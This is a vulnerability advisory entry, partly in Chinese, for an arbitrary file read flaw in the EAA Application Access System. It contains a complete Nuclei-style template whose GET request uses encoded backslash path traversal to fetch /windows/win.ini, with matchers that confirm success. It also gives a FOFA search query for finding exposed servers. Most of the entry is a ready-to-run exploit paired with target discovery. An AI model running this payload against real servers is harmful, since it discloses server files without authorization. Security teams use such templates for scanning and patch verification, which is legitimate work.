eaa-app-lfi: EAA Application Access System - Arbitary File Read

日期: 2025-08-01 | 影响软件: EAA Application Access System | POC: 已公开

漏洞描述

There is an arbitrary file reading vulnerability in the VA virtual application platform of Tingzhi Technology, through which an attacker can obtain sensitive information in the server.

PoC代码[已公开]

id: eaa-app-lfi

info:
  name: EAA Application Access System - Arbitary File Read
  author: momika233
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in the VA virtual application platform of Tingzhi Technology, through which an attacker can obtain sensitive information in the server.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%9C%86%E6%99%BA%E7%A7%91%E6%8A%80%20VA%E8%99%9A%E6%8B%9F%E5%BA%94%E7%94%A8%E5%B9%B3%E5%8F%B0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="EAA益和应用接入系统"
  tags: eaa,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

      - type: word
        part: header
        words:
          - "application/octet-stream"
          - "filename=win.ini"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022008b933dc5b95a0aabadc63cfb7b66f489d0e60a0ab3694dbcfe41445a4ac770a022002da560ad90ad13ad45a3cfbd9d496cc20f8e1c00ce852f917127c5b56cd7523:922c64590222798bb761d5b6d8e72950

相关漏洞推荐